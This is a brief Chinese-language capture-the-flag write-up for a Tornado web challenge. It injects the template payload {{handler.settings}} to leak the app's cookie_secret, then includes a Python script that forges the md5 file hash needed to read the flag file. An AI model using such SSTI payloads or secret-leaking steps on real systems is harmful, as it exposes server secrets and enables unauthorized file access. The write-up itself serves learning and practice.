这里有一个hint点进去看看,他说md5(cookie_secret+md5(filename)),所以我们需要获得cookie_secret的value
根据题目tornado,它可能是tornado的SSTI
这里吧filehash改为NULL.
是tornado的SSTI
输入{{handler.settings}} (settings 属性是一个字典,它包含了Tornado应用的全局配置信息)
查看全局配置
拿到cookie_secret
开始构造exp
import hashlib
filename='/fllllllllllllag'
cookie_secret = '76fc62a3-fea5-46ab-8f95-4b7262246f8c'
filename=hashlib.md5(filename.encode()).hexdigest()
a=cookie_secret+filename
result=hashlib.md5(a.encode()).hexdigest()
print(result)
